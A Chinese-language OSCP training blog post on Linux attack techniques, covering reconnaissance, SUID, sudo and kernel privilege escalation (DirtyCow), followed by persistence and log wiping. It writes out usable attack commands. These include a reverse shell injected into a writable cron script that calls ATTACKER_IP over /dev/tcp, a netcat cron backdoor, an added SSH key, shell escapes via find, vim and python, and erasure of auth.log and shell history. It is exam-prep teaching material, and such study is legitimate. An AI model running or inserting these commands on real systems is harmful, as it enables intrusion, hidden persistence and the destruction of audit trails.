当前位置: 首页 > news >正文

OSCP渗透实战(第二期):Linux系统攻防与权限提升完全指南

OSCP渗透实战(第二期):Linux系统攻防与权限提升完全指南

“Try Harder”不仅是口号,更是渗透测试者的生存法则。上期揭秘OSCP黄金认证的价值,本期将带你拆解Linux系统渗透的致命武器库。


1. Linux信息收集:渗透前的“战场侦察”

目标:全面掌握目标系统环境,定位攻击入口。

1.1 系统核心信息收集
  • 操作系统与内核版本

    uname -a  # 内核版本、主机名、架构
    cat /etc/*-release  # 发行版详细信息
    cat /proc/version   # 内核编译信息
    

    关键点:内核版本决定漏洞利用可行性(如DirtyCow需内核≤4.8.3)。

  • 环境变量与敏感路径

    env  # 查看环境变量,可能含API密钥
    find / -writable -type d 2>/dev/null  # 查找可写目录
    
1.2 权限漏洞扫描
  • SUID/SGID文件挖掘

    find / -perm -u=s -type f 2>/dev/null  # 查找SUID文件
    find / -perm -g=s -type f 2>/dev/null  # 查找SGID文件
    

    高危案例:若发现find命令具SUID权限,直接提权:

    find . -exec /bin/sh -p \; -quit  # 启动root shell
    
  • 定时任务漏洞利用

    cat /etc/crontab  # 查看系统定时任务
    ls -la /etc/cron.*  # 检查自定义任务
    

    攻击逻辑:若任务脚本可写,注入反向Shell代码:

    echo "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" >> /path/to/task.sh
    

2. 权限提升:从普通用户到Root的“致命跳跃”

核心思路:利用配置错误、内核漏洞或服务缺陷突破权限壁垒。

2.1 内核漏洞提权(最高危手段)
  • 漏洞识别与利用流程
    1. 确认内核版本:uname -a
    2. 搜索匹配漏洞:searchsploit linux kernel 3.13
    3. 编译执行EXP(以DirtyCow为例):
      gcc -pthread dirty.c -o dirty -lcrypt  # 编译漏洞利用代码
      ./dirty mypassword                     # 创建root权限账户
      
    :DirtyCow(CVE-2016-5195)影响内核2.6.22-4.8.3,成功率超90%。
2.2 Sudo权限滥用
  • 检测可提权的Sudo命令
    sudo -l  # 查看当前用户可执行的特权命令
    
    经典提权场景
    • Vi/Vim编辑器sudo vim -c ':!/bin/sh'
    • Python解释器sudo python -c 'import os; os.system("/bin/sh")'
    • Find命令sudo find / -exec bash -p \;

3. 后渗透阶段:权限维持与痕迹清理

目标:建立持久访问通道,隐匿攻击行为。

3.1 后门部署技术
  • SSH后门
    echo "ssh-rsa AAAAB3Nza... attacker@kali" >> ~/.ssh/authorized_keys  # 添加公钥
    
  • Cron持久化
    (crontab -l; echo "*/5 * * * * nc ATTACKER_IP 4444 -e /bin/sh") | crontab -  # 每5分钟反弹Shell
    
3.2 日志清除(谨慎使用)
# 清除当前用户历史记录
shred -zu ~/.bash_history  # 覆盖并删除
# 清理auth.log(需root)
echo "" > /var/log/auth.log

4. 实战工具推荐:OSCP考生必备利器
工具名称用途命令示例
LinPEAS自动化扫描提权路径curl -L https://.../linpeas.sh | sh
Linux Exploit Suggester内核漏洞匹配./les.sh -k 3.13
pspy监控进程无需root权限./pspy64

5. 技术交流与实战直播预告

私信我加入技术交流群,本周六、周日群内将直播实战演练两台OSCP PG靶场!

  • 直播内容
    • 从信息收集到权限提升的全流程演示
    • OSCP考试高频漏洞复现(如缓冲区溢出、SUID提权)
    • 互动答疑,解决你的实战难题
  • 适合人群
    • OSCP备考者
    • 渗透测试初学者
    • 安全技术爱好者

下期预告

Windows权限提升终极指南

  • 注册表后门植入(Image File Execution Options劫持)
  • MS17-010永恒之蓝实战复现
  • Pass-the-Hash攻击内网域控
    “从一台Windows主机到掌控整个域,你只差三个漏洞的距离。”

声明:本文技术仅用于授权渗透测试,严禁非法入侵!

http://www.dtcms.com/a/461156.html

相关文章:

  • LeetCode 118. 杨辉三角
  • AI原生应用架构白皮书 - AI原生应用架构及其关键要素
  • 蓝绿发布与金丝雀发布策略简介_笔记
  • 流媒体视频技术在明厨亮灶场景中的深度应用
  • 建设网站是否需要一个主机全球邮企业邮箱登录
  • 余弦相似度凭什么成了文本推荐的“方向指南针”?从几何夹角到语义匹配的AI密码
  • 解决Docker Hub被封的问题
  • 基于android的中天模拟键盘APP的设计与实现(初稿)
  • 数据结构——十七、线索二叉树找前驱与后继
  • 数据结构-----栈队列
  • 兰州网站制作有哪些怎样下载字体到wordpress
  • 【ASP.NET Core】分布式场景下ASP.NET Core中JWT应用教程
  • C++分布式语音识别服务实践——性能优化与实战部署
  • 【硬核分表】MySQL水平分表全景指南:从策略对比、全局ID到ShardingSphere实战
  • 零基础学AI大模型之Stream流式输出实战
  • Nacos 实战指南:微服务下服务注册与配置管理的完整落地
  • 网站站seo教程深圳有几个区哪个区最富裕
  • 网站seo诊断分析和优化方案企业形象设计课程标准
  • linux中jenkins正常启动外部无法访问
  • 紫砂壶网站开发与设计报告论文大型门户网站建设所具有的功能模块主要有几种类型
  • TCC 与 Saga 分布式事务:最终一致性实战指南
  • python如何把png图片转jpg
  • CentOS 7 上安装 PostgreSQL
  • PCIe协议之Margning篇之 Margining 入门
  • 业主信息查询优化说明
  • 农产品调度运维可视化
  • Javascript本地存储的方式有哪些?区别及应用场景?
  • 【深度学习05】PyTorch:完整的模型训练套路
  • 深入理解C++中的移动语义从拷贝优化到资源所有权的转移
  • 手机网站后台管理郑州制作网站电话133